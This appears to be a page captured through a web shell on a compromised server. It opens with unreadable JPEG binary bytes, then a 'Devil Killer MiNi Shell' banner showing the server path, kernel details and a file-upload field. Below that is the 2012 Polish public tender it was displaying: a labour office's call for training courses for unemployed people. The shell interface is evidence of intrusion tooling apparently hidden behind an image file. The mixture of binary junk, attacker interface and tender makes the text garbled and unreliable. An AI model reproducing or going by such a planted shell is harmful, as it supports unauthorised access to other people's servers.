JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/109385-N-2012.html

<p class="kh_header"><b>Siemianowice Śląskie: Szkolenia dla osób bezrobotnych w ramach projektu 
Gotowa do pracy 6.1.1 PO KL</b><br>
<b>Numer ogłoszenia: 109385 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Siemianowicach Śląskich , ul. Wyzwolenia 17, 41-103 Siemianowice Śląskie, woj. śląskie, tel. 032 7652945, 7652949, faks 032 7652940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.siemianowice.slaskie.sisco.info/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia dla osób bezrobotnych w ramach projektu 
Gotowa do pracy 6.1.1 PO KL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w zakresie:
Zadanie 1	Podstawy obsługi komputera oraz urządzeń biurowych - XII grup do 10 osób
Zadanie 2	Kucharz małej gastronomii + książeczka zdrowia- do 6 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 3	Opiekun osób starszych i niepełnosprawnych - do 3 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 4	Opiekun osób starszych i niepełnosprawnych + język niemiecki - do 3 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 5	Obsługa kasy fiskalnej + minimum sanitarne + książeczka zdrowia - do 6 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 6	Księgowość + kadry - płace - do 6 osób (osoby kierowane będą w formie 
indywidualnej)
Zadanie 7	Cukiernik + zdobienie tortów - do 6 osób (osoby kierowane będą w formie indywidualnej
Zadanie 8	Masaż I stopnia - do 6 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 9	Profesjonalna sprzątaczka - do 6 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 10	Usługi krawieckie - do 6 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 11	Skuteczne techniki sprzedaży - do 6 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 12	Projektowanie ogrodów - do 6 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 13	Profesjonalny doradca finansowy - do 6 osób (osoby kierowane będą w formie indywidualnej)
Zadanie 14	Konsultant ślubny - do 6 osób (osoby kierowane będą w formie indywidualnej)

Szkolenia muszą odbywać się zgodnie z planem nauczania obejmującym nie mniej niż 30 godzin zegarowych w tygodniu (godzina zegarowa liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, długość przerw może być ustalana w sposób elastyczny*). W pierwszym dniu szkolenia zajęcia należy zaplanować na godz. 8.00 i przeznaczyć pierwsze 30 minut na sprawy organizacyjne. 

Zamawiający nie ma obowiązku skierowania na szkolenia wszystkich w/w osób, ani we wszystkich zawodach, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia, z tym, że powyższe nie zwalnia Wykonawcy z obowiązku zapewnienia gotowości przyjęcia skierowanego bezrobotnego na szkolenie we wszystkich zawodach i we wskazanych ilościach.  

W ramach realizacji każdej części zamówienia, Wykonawca zobowiązany jest do:
a) zapewnienia wszystkim uczestnikom szkolenia usługi cateringowej, w ramach której dostarczy na czas jego trwania napoje (kawa, herbata, woda mineralna, sok) oraz według wyboru Wykonawcy kanapek albo suchych przekąsek lub owoców;
b) Zwrotu kosztów dojazdu z miejsca zamieszkania uczestnika szkolenia na miejsce odbywania zajęć teoretycznych lub praktycznych i z powrotem, stanowiących równowartość kosztów zakupu biletów komunikacji miejskiej na czas trwania szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać aktualny wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy, zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia ich działalności jest krótszy - w tym okresie - wykonał co najmniej 1 usługę szkoleniową, obejmującą swym zakresem i rodzajem usługi stanowiące przedmiot zamówienia z podaniem daty i miejsca wykonania wraz z dokumentami potwierdzającymi wykonanie ww. usług z należytą starannością. Warunek ten będzie uznany za spełniony w przypadku, gdy Wykonawca wykaże co najmniej 1 szkolenie w zakresie tożsamym z przedmiotem szkolenia w wymienionym okresie czasu.  Spełnienie tego warunku dotyczy każdego zadania objętego przedmiotem zamówienia odrębnie. W przypadku szkoleń organizowanych u Zamawiającego dokument potwierdzający należyte wykonanie usługi nie jest wymagany.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że posiada pomieszczenia dostosowane do prowadzenia zajęć dla całej grupy skierowanych osób bezrobotnych, posiada odpowiednią ilość sprzętu zapewniającą każdej skierowanej osobie możliwość wykorzystania go w trakcie szkolenia (w przypadku zadania nr 1 wymagane jest jedno stanowisko komputerowe dla każdego uczestnika w miejscu odbywania się szkolenia), posiada nowoczesne pomoce dydaktyczne podnoszące atrakcyjność, skuteczność prowadzonych szkoleń, zapewnić odpowiednie zaplecze socjalne (dostęp do toalety, bieżącej wody).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że dysponuje osobami w charakterze wykładowców, które wykażą się co najmniej 2-letnim doświadczeniem zawodowym w zakresie prowadzonej przez siebie tematyki zajęć wskazanej przez Wykonawcę - dot. zadań 1,2,3,4,5,6,7,8,9,10,11,12,13,14.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z realizacją przedmiotu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Programu szkolenia, obejmującego:  
a. nazwę i zakres szkolenia, 
b. czas trwania i sposób organizacji zajęć (z uwzględnieniem ich częstotliwości), 
c. wymagania wstępne dla uczestników szkolenia, 
d. cele szkolenia, 
e. plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar z uwzględnieniem części teoretycznej i praktycznej, treści szkolenia w zakresie  poszczególnych zajęć edukacyjnych, 
f. wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 
g. sposób sprawdzania efektów szkolenia, 
h. wskazanie części zamówienia, której wykonanie Wykonawca powierzy  podwykonawcom, 
2. Wzoru zaświadczenia ukończenia szkolenia, 
3. Opisu nadzoru wewnętrznego służącego podnoszeniu jakości prowadzonego szkolenia.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Doswiadczenie kadry dydaktycznej - 10</li>
<li>3 - Doświadczenie wykonawcy - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególnie uzasadnionych przypadkach Zamawiający przewiduje możliwość wprowadzenia zmian w umowie dotyczących:
a. zmniejszenia liczby osób gdy liczba zainteresowanych szkoleniem osób bezrobotnych będzie mniejsza niż planowana w umowie,
b. terminu szkolenia, w przypadku, gdy liczba osób zainteresowanych uczestnictwem 
w szkoleniu nie przekroczy 50% liczby osób, zakładanej przez Zamawiającego 
do przeszkolenia w danym zakresie, wskazanej w niniejszej SIWZ (dot. zad. nr 1),
c. miejsca szkolenia, w przypadku, gdy Wykonawca zaproponuje lepsze warunki lokalowe niż wymienione w ofercie, w przypadku awarii sali szkoleniowej lub budynku uniemożliwiającej przeprowadzenie zajęć lub kiedy umowa miedzy Wykonawca a właścicielem sali przeznaczonej na szkolenie zostanie rozwiązana z przyczyn nie leżących po stronie Wykonawcy,
d. harmonogramu przeprowadzonych zajęć, w przypadku, kiedy wykładowca przewidziany 
do realizacji danego modułu ze względów zdrowotnych lub zawodowych nie może przeprowadzić zajęć w danym terminie,
e. kadry dydaktycznej, w przypadku, gdy zostanie rozwiązana umowa miedzy Wykonawca  a wykładowcą lub kiedy wykładowca przewidziany do realizacji danego modułu z przyczyn nie leżących po stronie Wykonawcy nie może kontynuować zlecenia zastrzegając jednocześnie, że ww. zmiany nie mogą wpłynąć na zmianę decyzji o wyborze najkorzystniejszej oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.siemianowice.slaskie.sisco.info/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Siemianowicach Śląskich 
ul. Wyzwolenia 17
41-103 Siemianowice Śląskie
pokój nr 6 (parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Siemianowicach Śląskich  
ul. Wyzwolenia 17 
41-103 Siemianowice Śląskie  
pokój nr 25 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podstawy obsługi komputera oraz urządzeń biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników: 120 osób. Szkolenia odbywać się będą w 12 grupach uczestników liczących do 10 osób w grupie. Szkolenie dla każdej z grup rozpoczynać się będzie w odstępach co najmniej miesięcznych.  
Minimalna ilość godzin - ogółem 120, w tym 90 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące:
a. Obsługa sprzętu i urządzeń wykorzystywanych w biurze: drukarka, faks, skaner, telefon komórkowy,
b. Budowa i działanie komputera,
c. Podstawowe pojęcia takie jak: plik, folder, system operacyjny etc,
d. Obsługa komputera. Edytor tekstu WORD. Arkusz kalkulacyjny EXCEL,
e. Obsługa Internetu oraz poczty elektronicznej (zakładanie własnego konta e-mail, pisanie listów elektronicznych, odbieranie poczty)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doświadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenei wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kucharz małej gastronomii + książeczka zdrowia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej). 

Minimalna ilość godzin - ogółem 220, w tym 200 godzin zajęć praktycznych. 
1. Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące:
Wizerunek pracownika małej gastronomii, 	Higiena żywności, HACCP, BHP, Kontrola sanitarno - epidemiologiczna w zakładach gastronomicznych, Obsługa konsumenta, 	Metody utrwalania żywności oraz zasady przechowywania produktów, Ocena i zastosowanie w technologii gastronomicznej, warzyw, ziemniaków, grzybów, owoców mleka i przetworów, serów, jaj, Sposoby zagęszczania potraw mąką, Ciasta kluskowe wyrabiane na stolnicy, Ciasta zarabiane w naczyniu, ziemniaczane, pierogowe, Klasyfikacja i zasady sporządzania zup i sosów, 	Ciasta spulchniane metodami, fizycznymi, chemicznymi, biologicznymi, Mięso zwierząt rzeźnych - ocena towaroznawcza, zastosowanie, podział tusz, Potrawy z mięsa gotowanego i smażonego, Potrawy z mięsa duszonego i pieczonego,Potrawy jarskie, Dietetyka, Potrawy z ryb gotowanych i smażonych, Podział, charakterystyka, sporządzanie i ocena zakąsek zimnych, Sosy zimne, Podział i charakterystyka deserów, Napoje zimne i gorące, Potrawy kuchni polskiej, Kuchnie regionalne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opiekun osób starszych i niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 3 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 160, w tym 140 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące:Opieka nad ludźmi chorymi i starszymi, Opieka nad osobami niepełnosprawnymi, 	Opieka ambulatoryjna nad osobami w podeszłym wieku przebywającymi we własnych mieszkaniach lub ośrodkach mieszkaniowych dla seniorów, Pierwsza pomoc przedlekarska, Pielęgniarstwo,	Rehabilitacja osób starszych i przewlekle chorych, Techniki prowadzenia rozmów w trudnych sytuacjach życiowych, Psychologia i pedagogika w opiece, Wybrane zagadnienia prawne z zakresu specjalistycznych usług opiekuńczych, Zagadnienia higieny osobistej oraz najbliższego środowiska, Podstawy dietetyki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
